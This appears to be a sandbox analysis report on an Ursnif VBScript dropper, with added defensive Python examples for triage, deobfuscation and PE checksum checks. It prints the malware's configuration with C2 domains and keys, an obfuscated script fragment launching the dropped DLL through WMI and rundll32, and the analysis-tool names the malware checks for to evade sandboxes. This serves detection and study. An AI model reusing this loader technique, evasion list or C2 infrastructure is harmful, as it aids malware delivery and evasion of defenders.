
Windows Analysis Report
gnAYDP69br2v.vbs

Overview

General Information

Sample Name: gnAYDP69br2v.vbs
Analysis ID: 560537
MD5: 694a1a5ee37e5c161a37d4166a677850
SHA1: adfdbca254f8f810735cf2224aca1630af762bea
SHA256: 0993c606df923ac8f174d7789fb494633c89d99d48747a91b866dc410cbd5814

Detection

Ursnif
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Antivirus detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

(classification diagram not reproduced; label: mal100.troj.evad.winVBS@6/2@0/0)

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6536 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 6620 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 6788 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 6772 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Ursnif, extracted from the rundll32.exe memory dump 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp:
{"lang_id": "RU, CN", "RSA Public Key": "YH51zbw68XXolzw8uQmujXgr7vnasuZcFgH7AJ2kGBzL4PhjIyVzy5MDJsglBibg5h0RNR44WiefAtoK6SAdWueylFfdzQd683oCOk4rKCggPtdTeSl7hrve2I0aDaCBkoeiOxpSRC00pY0DaAjoBH1DxdU5ti0d0lMA4aqyGSJ+NcMQxJbjly/3eM1JgxTeRv8qfeoCn1t6fo9nKZliSXvxzEf8TXf46mNAineKBDDVsAYvylxjeMV9NuQnAN5bCZLiyp7C5x9eiMqtTEAUnFh9cMrGskg6XvfPGY7auFDj9EDMWtYHKhgHVdRDPVkTTSsGy44FUesZ+6Z4Xw7vU9rgofRZORY0rQQe0OFqz4s=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "gX5RILpAQgp3pEaS", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps
Source | Rule | Description | Author
00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security

Unpacked PEs
Source | Rule | Description | Author
23.2.rundll32.exe.2ca0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
23.3.rundll32.exe.4638d0f.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
23.2.rundll32.exe.4b694a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
23.2.rundll32.exe.6ffa0000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
23.2.rundll32.exe.4b694a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security

Sigma Overview

No Sigma rule has matched


                AV Detection

Source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "YH51zbw68XXolzw8uQmujXgr7vnasuZcFgH7AJ2kGBzL4PhjIyVzy5MDJsglBibg5h0RNR44WiefAtoK6SAdWueylFfdzQd683oCOk4rKCggPtdTeSl7hrve2I0aDaCBkoeiOxpSRC00pY0DaAjoBH1DxdU5ti0d0lMA4aqyGSJ+NcMQxJbjly/3eM1JgxTeRv8qfeoCn1t6fo9nKZliSXvxzEf8TXf46mNAineKBDDVsAYvylxjeMV9NuQnAN5bCZLiyp7C5x9eiMqtTEAUnFh9cMrGskg6XvfPGY7auFDj9EDMWtYHKhgHVdRDPVkTTSsGy44FUesZ+6Z4Xw7vU9rgofRZORY0rQQe0OFqz4s=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "gX5RILpAQgp3pEaS", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Source: C:\Users\user\AppData\Local\Temp\melange.yuv, Avira: detection malicious, Label: TR/AD.UrsnifDropper.vsbvn
Source: Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_7000EEA1 FindFirstFileExW

                Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match, file source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                E-Banking Fraud

Source: Yara match, file source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_6FFA2274
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_7000CA4A
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_70003761
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 70002290 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_6FFA14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_6FFA1B4A NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_6FFA1382 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_6FFA2495 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe, Process Stats: CPU usage > 98%
Source: gnAYDP69br2v.vbs, Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
Source: unknown, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (VBScript engine)
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: classification engine, Classification label: mal100.troj.evad.winVBS@6/2@0/0
Source: gnAYDP69br2v.vbs, Static file information: File size 2488066 > 1048576
Source: Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr
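The process-creation entries above are the detection-relevant part of this report: the script does not spawn the payload itself but calls Win32_Process::create over WMI, so rundll32.exe (PID 6788) appears under WmiPrvSE.exe rather than under wscript.exe, and the module it loads is a PE renamed to .yuv in the user's Temp directory. No Sigma rule matched. The block below is an added example, not part of the Joe Sandbox report: a triage function over process-creation records, constructed by hand from the process tree above using Sysmon Event ID 1 field names, that flags the traits this launch combines (WmiPrvSE.exe parent, non-PE extension, user-writable module path, DllRegisterServer export). The benign control record (setup.exe registering vendor.dll) is made up.

```python
import ntpath
import re

# Constructed sample: process-creation records built from the process tree in
# this report (images, PIDs and command lines as listed there). Field names
# follow Sysmon Event ID 1, but the records are hand-made, not exported events.
EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "ProcessId": 6536,
     "CommandLine": r'C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"',
     "ParentImage": None},                      # parent listed as "unknown" in the report
    {"Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "ProcessId": 6620,
     "CommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",
     "ParentImage": None},                      # parent listed as "unknown" in the report
    {"Image": r"C:\Windows\System32\rundll32.exe", "ProcessId": 6788,
     "CommandLine": r"rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\SysWOW64\rundll32.exe", "ProcessId": 6772,
     "CommandLine": r"rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer",
     "ParentImage": r"C:\Windows\System32\rundll32.exe"},
    # Benign control record (made up): an installer registering its own COM server.
    {"Image": r"C:\Windows\System32\rundll32.exe", "ProcessId": 4242,
     "CommandLine": r"rundll32.exe C:\Program Files\Vendor\vendor.dll,DllRegisterServer",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
]

PE_EXTENSIONS = {".dll", ".exe", ".ocx", ".cpl", ".scr", ".sys", ".drv", ".ax"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\",
                 "\\programdata\\", "\\downloads\\")
# rundll32 [module],[export]: the module path may contain spaces and may be quoted
_RUNDLL_ARG = re.compile(r'^\s*"?rundll32(?:\.exe)?"?\s+"?(?P<module>[^,"]+)"?\s*,\s*(?P<export>\S+)',
                         re.IGNORECASE)


def rundll32_findings(event):
    """Suspicious traits of one process-creation record; an empty list means none."""
    if ntpath.basename(event["Image"]).lower() != "rundll32.exe":
        return []
    findings = []
    parent = ntpath.basename(event.get("ParentImage") or "").lower()
    if parent == "wmiprvse.exe":
        findings.append("parent is WmiPrvSE.exe: launched via Win32_Process.Create, real parent hidden")
    match = _RUNDLL_ARG.match(event["CommandLine"])
    if match:
        module = match.group("module").strip().lower()
        ext = ntpath.splitext(module)[1]
        if ext not in PE_EXTENSIONS:
            findings.append(f"module extension {ext or '(none)'} is not a PE extension")
        if any(d in module for d in USER_WRITABLE):
            findings.append("module loaded from a user-writable directory")
        if findings and match.group("export").lower() == "dllregisterserver":
            findings.append("DllRegisterServer used to run an otherwise suspicious module")
    return findings


def triage(events):
    """PID -> findings for every record that has at least one."""
    hits = {}
    for event in events:
        findings = rundll32_findings(event)
        if findings:
            hits[event["ProcessId"]] = findings
    return hits


if __name__ == "__main__":
    for pid, findings in triage(EVENTS).items():
        print(pid, *findings, sep="\n  ")
```

The parent check alone is the weakest of the three signals: WmiPrvSE.exe also parents legitimate WMI-launched tasks from management tooling, so it is combined here with the module's extension and location rather than alerted on by itself. The second rundll32.exe (PID 6772) is the SysWOW64 re-launch of the 32-bit DLL and is caught by the module checks even though its parent is rundll32.exe.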

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)REM feud policy theology irate liven comparator Ralph megavolt televise gift alarm cultivable javelin ovary Rufus craven bevy hunt ugly marrowbone magnetic End WithDim quadrupole: Set quadrupole = CreateObject("WScript.Shell")Dim Ijil: Set Ijil = CreateObject("Scripting.FileSystemObject")If (Ijil.FileExists(SvurK + "adobe.url")) Then' clubhouse turbulent delegate, 5083367 intend academia involution imperishable convulsion fee clandestine springtime stearic tibia condemnatory crook handkerchief orphanage tepid fence teapot ocph("DEBUG: F_LOCKFILE - False")ROpElseWith quadrupole.createShortcut(SvurK + "adobe.url").TargetPath = "https://adobe.com".Save()End Withocph("DEBUG: F_LOCKFILE - True")' salon Coddington fast McBride sunset February croft mannequin acuity purvey vindictive End IfEnd FunctionFunction weHra()ocph("DEBUG: F_RUN - Start")UuH=60000' strontium deoxyribose testicle carpetbagger thulium lye Silas standpoint confirm lavish ragging, raven broadloom collar moral, Mecca standard songbird Harlan earnest exfoliate soupy=40000RandomizeSet BYkLiService = GetObject("winmg" + "mts:Win32_Pro" + "cess")REM spill family towhead honeysuckle alkaloid. 
4079355 wholesome usurpation sheath suffer oilmen whimsey emerald Morgan, 4462814 If (InStr(WScript.ScriptName, cStr(58462)) > 0 And sapsucker = 0) ThenChiangWith WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)End Witharchetype471 = "ca" + "lc.e" + "xe"' eft enormous Muzak Thor Polynesia pendant Dempsey contraception phosphide blockade belie clement covariant deadhead debilitate petrochemical amide BYkLiService.create archetype471ocph("DEBUG: F_RUN_T - True")ElseChiangWith WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)End WithUCTw = "rundll32" + " " + SvurK + "melange.yuv" + ",DllRegisterServer":BYkLiService.create UCTwocph("DEBUG: F_RUN_W - True")alLA("-")EMExEnd IfEnd FunctionFunction VuibL()ocph("DEBUG: FS_CLB - Start")' fortunate assonant atrophic absolution estimate lovelorn vegetate, plumb pappy stillwater schoolgirlish on error resume nextDim UuH,soupyREM saloon Pritchard sadden. indolent rancho Semite Harrington inflater stoneware bemadden. Rochester drake800 Shattuck UuH=5000soupy=2000RandomizeWScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)set BYkLi = GetObject("winmgmts:\\.\root\cimv2")' thunderflower niece mountaintop diverse roost putty duel compressible Buchenwald immutable Fomalhaut. 8154240 wont crowd carcass grownup dialectic taught curtain confederate invoke denouement set FtLaZ = BYkLi.InstancesOf("Win32_OperatingSystem")for each hSW in FtLaZaesthetic = hSW.LastBootUpTime' souvenir minuscule committal Havana heartbreak f cure helicopter tung Gorton, backorder Midwest jFE = Mid(aesthetic,1,4) & "-" & Mid(aesthetic,5,2) & "-" & Mid(aesthetic,7,2) & " " & Mid(aesthetic,9,2) & ":" & Mid(aesthetic,11,2) & ":" & Mid(aesthetic,13,2)monologistec = abs(datediff("s",jFE,now))ZuAV = monologistec \ 60REM hut orange copperhead selfadjoint clomp byline approximate t
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_6FFA2263 push ecx; ret (at 23_2_6FFA2273)
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_6FFA2210 push ecx; ret (at 23_2_6FFA2219)
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_700022D6 push ecx; ret (at 23_2_700022E9)
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_70001C44 push ecx; ret (at 23_2_70001C57)
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_7004C4C0 push ebx; iretd (at 23_2_7004C4D0)
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_7004D302 push edx; ret (at 23_2_7004D306)
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress
Source: melange.yuv.0.dr, Static PE information: real checksum: 0xab069 should be: 0xb1a89
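The AMSI entry above shows what the obfuscation in this script actually consists of: junk-word comments after REM and ' on almost every line, string literals split and rejoined with + ("winmg" + "mts:Win32_Pro" + "cess", "ca" + "lc.e" + "xe"), a decoy branch that launches calc.exe when the script's own file name contains 58462, and otherwise the rundll32 ... melange.yuv,DllRegisterServer launch through the WMI Win32_Process object. AMSI hands the engine the buffer it is about to execute, so the concatenation does not hide anything from it, but the junk comments make the capture hard to read. The block below is an added example, not part of the report or of the malware: a small VBScript cleaner run over an excerpt of that capture, with the line breaks restored by hand (the sandbox prints the buffer as one run-on line) and the junk comments shortened. It removes comments string-aware (a ' inside a literal is not a comment), splits statements on :, and folds adjacent literals joined by + or & until nothing changes.

```python
import re

# Constructed sample: an excerpt of the script buffer that AMSI captured from
# wscript.exe in this report, with line breaks put back by hand. Identifier
# names are the script's own; the junk-word comments are shortened.
AMSI_EXCERPT = '''\
Function weHra()
ocph("DEBUG: F_RUN - Start")
UuH=60000' strontium deoxyribose testicle carpetbagger
soupy=40000
Randomize
Set BYkLiService = GetObject("winmg" + "mts:Win32_Pro" + "cess")
REM spill family towhead honeysuckle alkaloid.
If (InStr(WScript.ScriptName, cStr(58462)) > 0 And sapsucker = 0) Then
WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)
archetype471 = "ca" + "lc.e" + "xe"
' eft enormous Muzak Thor Polynesia pendant Dempsey
BYkLiService.create archetype471
Else
UCTw = "rundll32" + " " + SvurK + "melange.yuv" + ",DllRegisterServer":BYkLiService.create UCTw
End If
End Function
'''

# two string literals joined by + or & (VBScript accepts both for concatenation)
_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')


def split_outside_strings(line, sep):
    """Split on `sep` only where it is not inside a "..." literal
    (a doubled "" inside a literal toggles twice, so it is handled too)."""
    parts, cur, in_str = [], [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        if ch == sep and not in_str:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return parts


def fold_literals(stmt):
    """Merge "a" + "b" and "a" & "b" into "ab", repeating until stable."""
    while True:
        folded = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', stmt)
        if folded == stmt:
            return folded
        stmt = folded


def deobfuscate(script):
    """Return the script's statements with comments removed and literals folded."""
    statements = []
    for raw in script.splitlines():
        code = split_outside_strings(raw, "'")[0]      # a ' comment runs to end of line
        for stmt in split_outside_strings(code, ":"):  # ':' separates statements
            stmt = stmt.strip()
            if re.match(r"REM\b", stmt, re.IGNORECASE):  # REM is only valid at statement start
                break                                    # and swallows the rest of the line
            if stmt:
                statements.append(fold_literals(stmt))
    return statements


def string_literals(statements):
    """Every literal that survives folding: the strings the script really uses."""
    found = []
    for stmt in statements:
        found.extend(re.findall(r'"([^"]*)"', stmt))
    return found


if __name__ == "__main__":
    for statement in deobfuscate(AMSI_EXCERPT):
        print(statement)
```

After folding, the launch line reads UCTw = "rundll32 " + SvurK + "melange.yuv,DllRegisterServer", which is as far as static cleanup can go: SvurK is the script's own variable for the Temp directory and is only known at run time, which is exactly why the AMSI capture (where it is already resolved) is the better source for the final command line. The cleaner does not execute anything, so it is safe to run on a captured buffer.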

                Persistence and Installation Behavior

Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\melange.yuv (dropped file)
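The dropped melange.yuv is the Ursnif DLL: rundll32 loads it, the extension does not match the content (the "Drops files with a non-matching file extension" signature), and its header CheckSum is wrong (0xab069 stored, 0xb1a89 expected, per the Data Obfuscation section). Both are cheap static checks worth running on every file a script drops. The block below is an added example, not part of the report: it recomputes the PE CheckSum with the algorithm the header field is defined by (the one imagehlp's CheckSumMappedFile and pefile implement: 32-bit word sum with end-around carry, skipping the field itself, folded to 16 bits plus the file size) and reports extension and checksum mismatches. The sample image is a constructed header-only 32-bit DLL, not a real executable and not the dropped file.

```python
import ntpath
import struct

PE_EXTENSIONS = {".dll", ".exe", ".sys", ".ocx", ".cpl", ".scr", ".drv", ".ax"}


def pe_checksum(data, checksum_offset):
    """IMAGE_OPTIONAL_HEADER.CheckSum over `data`: sum 32-bit words with
    end-around carry, skip the CheckSum field, fold to 16 bits, add the length."""
    total = 0
    padded = data + b"\0" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def pe_triage(data, filename):
    """Static checks for a dropped file: is it a PE, does its extension say so,
    and does the stored CheckSum match the recomputed one."""
    result = {"is_pe": False, "extension_mismatch": False, "stored_checksum": None,
              "computed_checksum": None, "checksum_unset": False, "checksum_mismatch": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return result
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return result
    result["is_pe"] = True
    result["extension_mismatch"] = ntpath.splitext(filename)[1].lower() not in PE_EXTENSIONS
    opt_header = e_lfanew + 4 + 20          # after the PE signature and the COFF file header
    checksum_offset = opt_header + 0x40     # CheckSum sits at +0x40 in both PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    computed = pe_checksum(data, checksum_offset)
    result.update(stored_checksum=stored, computed_checksum=computed,
                  checksum_unset=(stored == 0),
                  checksum_mismatch=(stored != 0 and stored != computed))
    return result


def build_minimal_pe(stored_checksum=0, size=512):
    """Constructed sample: a header-only 32-bit DLL image (no sections, no code),
    enough for the checks above; it is not a real or loadable executable."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 0xE0, 0x2102)  # i386, opt hdr 0xE0, DLL|EXEC|32BIT
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 0x40, stored_checksum)                # CheckSum field
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    return image + b"\0" * (size - len(image))


if __name__ == "__main__":
    print(pe_triage(build_minimal_pe(), "melange.yuv"))
```

Windows only enforces the CheckSum for drivers and a few boot-time images, so a zero value is common in legitimate user-mode binaries and is reported separately as unset; a non-zero value that does not match, as with melange.yuv, is the stronger signal, since it usually means the file was modified or packed after the linker wrote the header.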

                Hooking and other Techniques for Hiding and Protection

Source: Yara match, file source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\wscript.exe, File deleted: c:\users\user\desktop\gnaydp69br2v.vbs
Source: C:\Windows\System32\wscript.exe, Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\rundll32.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX (5 occurrences)

                Malware Analysis System Evasion

Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp and 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp, Binary or memory strings (analysis-tool process names, listed as extracted, trailing bytes included):
  • AUTORUNSC.EXE
  • EMUL.EXE
  • SBIECTRL.EXE
  • APISPY.EXE
  • $FAKEHTTPSERVER.EXE
  • REGMON.EXEIK
  • WINDBG.EXE
  • SCKTOOL.EXE;HQ
  • IDAQ.EXET
  • WINDUMP.EXE
  • SYSANALYZER.EXEA
  • PETOOLS.EXEJ
  • PROCMON.EXE
  • HOOKEXPLORER.EXE
  • NETSNIFFER.EXEK
  • AUTORUNS.EXE@
  • IDAG.EXE:V
  • REGSHOT.EXE
  • WIRESHARK.EXE
  • FORTITRACER.EXEA
  • SBIESVC.EXE
  • IMPORTREC.EXE
  • IMUL.EXE.8
  • Q?$SANDBOXIERPCSS.EXEV5
  • :FRIDA-WINJECTOR-HELPER-32.EXE
  • PEID.EXE#Z
  • OLLYDBG.EXE
  • HOOKANAAPP.EXE
  • :FRIDA-WINJECTOR-HELPER-64.EXE
  • U.SANDBOXIEDCOMLAUNCH.EXE
  • FILEMON.EXET
  • TCPDUMP.EXE
  • A9$BEHAVIORDUMPER.EXEQ
  • DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, Binary or memory strings:
  • BEHAVIORDUMPER.EXE@Q
  • IMPORTREC.EXE@
  • HOOKEXPLORER.EXE@
  • FORTITRACER.EXE
  • FRIDA-WINJECTOR-HELPER-64.EXEICAL@
  • APISPY.EXE@
  • IMUL.EXE@.8
  • FRIDA-WINJECTOR-HELPER-32.EXE
  • SCKTOOL.EXE
  • PEID.EXE@#Z
  • HOOKANAAPP.EXE@
  • AUTORUNSC.EXEH
  • SYSANALYZER.EXE@A
  • PROCMON.EXE@
  • SBIECTRL.EXE@
  • SBIESVC.EXE
  • IDAG.EXE@:V
  • SANDBOXIERPCSS.EXE@V5
  • IDAQ.EXE
  • OLLYDBG.EXE
  • PETOOLS.EXE@J
  • AUTORUNS.EXE
  • TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.739566081.00000274BF6FF000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string (tail of the script's own array of process names): ULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: C:\Windows\SysWOW64\rundll32.exe, Evasive API call chain: NtQuerySystemInformation, DecisionNodes, Sleep (graph_23-16243)
Source: C:\Windows\System32\wscript.exe TID: 7144, Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe, Window / User API: threadDelayed 375
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe, Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 23_2_7000EEA1 FindFirstFileExW

                Anti Debugging

                barindex
                Source: C:\Windows\SysWOW64\rundll32.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep | graph_23-16243
